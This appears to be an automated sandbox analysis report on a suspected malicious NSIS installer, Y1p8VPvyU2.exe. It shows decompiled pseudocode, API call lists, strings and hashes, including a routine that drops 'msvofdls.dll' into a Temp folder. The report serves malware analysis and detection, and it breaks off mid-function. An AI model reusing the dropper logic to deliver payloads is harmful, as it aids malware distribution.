						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x725d88
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x68
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                      0x0040348f
                                      0x00403498
                                      0x0040349f
                                      0x004034a1
                                      0x004034b5
                                      0x004034c7
                                      0x004034d1
                                      0x004034d6
                                      0x004034dc
                                      0x004034ef
                                      0x004034ef
                                      0x004034fa
                                      0x004034a3
                                      0x004034ae
                                      0x004034ae
                                      0x004034ff
                                      0x00403504
                                      0x00403509
                                      0x00403512
                                      0x0040351e
                                      0x004035a5
                                      0x004035ad
                                      0x004035b6
                                      0x004035b6
                                      0x004035cc
                                      0x004035d2
                                      0x004035e0
                                      0x0040366f
                                      0x00403677
                                      0x00403681
                                      0x00403686
                                      0x0040368c
                                      0x0040370b
                                      0x00403710
                                      0x00403712
                                      0x0040372e
                                      0x00000000
                                      0x0040372e
                                      0x00403714
                                      0x0040371a
                                      0x00403722
                                      0x00403722
                                      0x00000000
                                      0x0040371a
                                      0x00403696
                                      0x004036a7
                                      0x004036a9
                                      0x004036ab
                                      0x004036b2
                                      0x004036b2
                                      0x004036ba
                                      0x004036c2
                                      0x004036c4
                                      0x004036c6
                                      0x004036cf
                                      0x004036d2
                                      0x004036d8
                                      0x004036d8
                                      0x004036de
                                      0x004036f7
                                      0x00403701
                                      0x00000000
                                      0x00403706
                                      0x00403679
                                      0x0040367b
                                      0x00000000
                                      0x004035e6
                                      0x004035e6
                                      0x004035ec
                                      0x004035f6
                                      0x004035fe
                                      0x00403608
                                      0x0040360e
                                      0x0040361c
                                      0x00403733
                                      0x00403733
                                      0x00000000
                                      0x00403733
                                      0x00403622
                                      0x0040362b
                                      0x0040366a
                                      0x00000000
                                      0x0040366a
                                      0x00403524
                                      0x00403524
                                      0x00403529
                                      0x00000000
                                      0x00000000
                                      0x0040352e
                                      0x00403533
                                      0x00403543
                                      0x00403548
                                      0x0040354f
                                      0x00000000
                                      0x00000000
                                      0x00403553
                                      0x00403555
                                      0x00403562
                                      0x00403562
                                      0x0040356a
                                      0x00403570
                                      0x00403598
                                      0x004035a0
                                      0x00000000
                                      0x00403582
                                      0x00403583
                                      0x0040358c
                                      0x00403592
                                      0x00403593
                                      0x00000000
                                      0x00403593
                                      0x0040358e
                                      0x00403590
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403590
                                      0x00403570

                                      APIs
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                      • lstrlenA.KERNEL32(hqliygqis,?,?,?,hqliygqis,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ), ref: 00403565
                                      • lstrcmpiA.KERNEL32(?,.exe,hqliygqis,?,?,?,hqliygqis,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                      • GetFileAttributesA.KERNEL32(hqliygqis), ref: 00403583
                                      • LoadImageA.USER32 ref: 004035CC
                                        • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                      • RegisterClassA.USER32 ref: 00403613
                                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                      • CreateWindowExA.USER32 ref: 00403664
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                      • GetClassInfoA.USER32 ref: 004036C2
                                      • GetClassInfoA.USER32 ref: 004036CF
                                      • RegisterClassA.USER32 ref: 004036D8
                                      • DialogBoxParamA.USER32 ref: 004036F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hqliygqis
                                      • API String ID: 914957316-2543560660
                                      • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                      • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                      • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                      • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E0040592B("C:\\Users\\hardz\\Desktop", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x8200
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0x4dbff
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0x4dc03
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                      0x00402c13
                                      0x00402c16
                                      0x00402c19
                                      0x00402c1c
                                      0x00402c22
                                      0x00402c33
                                      0x00402c38
                                      0x00402c4b
                                      0x00402c50
                                      0x00402c53
                                      0x00402c59
                                      0x00000000
                                      0x00402c5b
                                      0x00402c66
                                      0x00402c6c
                                      0x00402c7d
                                      0x00402c84
                                      0x00402c8a
                                      0x00402c8c
                                      0x00402c91
                                      0x00402c93
                                      0x00402d80
                                      0x00402d82
                                      0x00402d87
                                      0x00402d8e
                                      0x00000000
                                      0x00000000
                                      0x00402d90
                                      0x00402d93
                                      0x00402db7
                                      0x00402dbc
                                      0x00402dc2
                                      0x00402dc4
                                      0x00402dcd
                                      0x00402dd2
                                      0x00402dd5
                                      0x00402dd6
                                      0x00402dd7
                                      0x00402dd9
                                      0x00402dde
                                      0x00402de1
                                      0x00402df4
                                      0x00402df8
                                      0x00402e00
                                      0x00402e05
                                      0x00402e07
                                      0x00402e07
                                      0x00402e07
                                      0x00402e0f
                                      0x00402e0f
                                      0x00402e12
                                      0x00402e13
                                      0x00402e13
                                      0x00402e16
                                      0x00402e18
                                      0x00402e18
                                      0x00402e18
                                      0x00402e22
                                      0x00402e28
                                      0x00402e36
                                      0x00402e3b
                                      0x00000000
                                      0x00402e3b
                                      0x00000000
                                      0x00402de1
                                      0x00402d9b
                                      0x00402da6
                                      0x00402dab
                                      0x00402dad
                                      0x00000000
                                      0x00000000
                                      0x00402db2
                                      0x00402db5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402c99
                                      0x00402c9e
                                      0x00402c9e
                                      0x00402ca3
                                      0x00402ca7
                                      0x00402cae
                                      0x00402cb3
                                      0x00402cb5
                                      0x00402cb7
                                      0x00402cb7
                                      0x00402cbb
                                      0x00402cc0
                                      0x00402cc2
                                      0x00402dec
                                      0x00402de3
                                      0x00000000
                                      0x00402de3
                                      0x00402cc8
                                      0x00402ccf
                                      0x00402d4b
                                      0x00402d4f
                                      0x00402d53
                                      0x00402d58
                                      0x00000000
                                      0x00402d4f
                                      0x00402cd8
                                      0x00402cdd
                                      0x00402ce0
                                      0x00402ce5
                                      0x00000000
                                      0x00000000
                                      0x00402ce7
                                      0x00402cee
                                      0x00000000
                                      0x00000000
                                      0x00402cf0
                                      0x00402cf7
                                      0x00000000
                                      0x00000000
                                      0x00402cf9
                                      0x00402d00
                                      0x00000000
                                      0x00000000
                                      0x00402d02
                                      0x00402d09
                                      0x00000000
                                      0x00000000
                                      0x00402d0b
                                      0x00402d11
                                      0x00402d1a
                                      0x00402d20
                                      0x00402d23
                                      0x00402d25
                                      0x00402d2b
                                      0x00000000
                                      0x00000000
                                      0x00402d31
                                      0x00402d35
                                      0x00402d3d
                                      0x00402d3d
                                      0x00402d40
                                      0x00402d40
                                      0x00402d43
                                      0x00402d45
                                      0x00402d47
                                      0x00402d47
                                      0x00000000
                                      0x00402d45
                                      0x00402d37
                                      0x00402d3b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402d59
                                      0x00402d59
                                      0x00402d5f
                                      0x00402d6b
                                      0x00402d6b
                                      0x00402d6e
                                      0x00402d74
                                      0x00402d76
                                      0x00402d76
                                      0x00402d7e
                                      0x00402d7e
                                      0x00000000
                                      0x00402d7e

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C1C
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Y1p8VPvyU2.exe,00000400), ref: 00402C38
                                        • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405606
                                        • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                      • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00402C84
                                      Strings
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                                      • Inst, xrefs: 00402CF0
                                      • "C:\Users\user\Desktop\Y1p8VPvyU2.exe" , xrefs: 00402C15
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                                      • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                                      • C:\Users\user\Desktop\Y1p8VPvyU2.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                                      • Error launching installer, xrefs: 00402C5B
                                      • Null, xrefs: 00402D02
                                      • soft, xrefs: 00402CF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Y1p8VPvyU2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-2207404279
                                      • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                      • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                      • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                      • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}
















                                      0x00401734
                                      0x0040173b
                                      0x00401744
                                      0x00401747
                                      0x0040174a
                                      0x0040174f
                                      0x00401757
                                      0x00401773
                                      0x00401759
                                      0x00401759
                                      0x0040175a
                                      0x0040175a
                                      0x00401779
                                      0x00401783
                                      0x00401783
                                      0x00401787
                                      0x0040178a
                                      0x0040178f
                                      0x00401791
                                      0x00401793
                                      0x00401798
                                      0x00401798
                                      0x004017a3
                                      0x004017a3
                                      0x004017b4
                                      0x004017b6
                                      0x004017b6
                                      0x004017b7
                                      0x004017b7
                                      0x004017ba
                                      0x004017bd
                                      0x004017c0
                                      0x004017c0
                                      0x004017c7
                                      0x004017d6
                                      0x004017db
                                      0x004017de
                                      0x004017e1
                                      0x00000000
                                      0x00000000
                                      0x004017e3
                                      0x004017e6
                                      0x00401840
                                      0x00401845
                                      0x004015a8
                                      0x0040264e
                                      0x0040264e
                                      0x0040287d
                                      0x00402880
                                      0x00402880
                                      0x00000000
                                      0x004017e8
                                      0x004017ee
                                      0x004017f9
                                      0x00401806
                                      0x00401811
                                      0x00401827
                                      0x00401827
                                      0x0040182a
                                      0x00000000
                                      0x00401830
                                      0x00401830
                                      0x00401831
                                      0x0040184e
                                      0x00402886
                                      0x00402886
                                      0x00402886
                                      0x00401833
                                      0x00401833
                                      0x00401834
                                      0x00401492
                                      0x00402200
                                      0x00402200
                                      0x00402200
                                      0x00401831
                                      0x0040182a
                                      0x00402888
                                      0x0040288c
                                      0x0040288c
                                      0x0040185e
                                      0x00401863
                                      0x00401869
                                      0x0040186a
                                      0x0040186b
                                      0x0040186e
                                      0x00401871
                                      0x00401876
                                      0x0040187c
                                      0x00401880
                                      0x00401882
                                      0x0040188a
                                      0x00401896
                                      0x00401884
                                      0x00401884
                                      0x00401888
                                      0x00000000
                                      0x00000000
                                      0x00401888
                                      0x0040189f
                                      0x004018a5
                                      0x004018a7
                                      0x00000000
                                      0x004018ad
                                      0x004018ad
                                      0x004018b0
                                      0x004018c8
                                      0x004018b2
                                      0x004018b5
                                      0x004018be
                                      0x004018be
                                      0x004018cd
                                      0x004018d2
                                      0x004021fb
                                      0x00000000
                                      0x004021fb
                                      0x00000000

                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,hqliygqis,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                      • CompareFileTime.KERNEL32(-00000014,?,hqliygqis,hqliygqis,00000000,00000000,hqliygqis,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                        • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,oryzytcrolozawnhxg Setup,NSIS Error), ref: 00405938
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                        • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                        • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj1052.tmp$C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll$hqliygqis
                                      • API String ID: 1941528284-2578532003
                                      • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                      • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                      • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                      • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402E44, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x9b5d
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
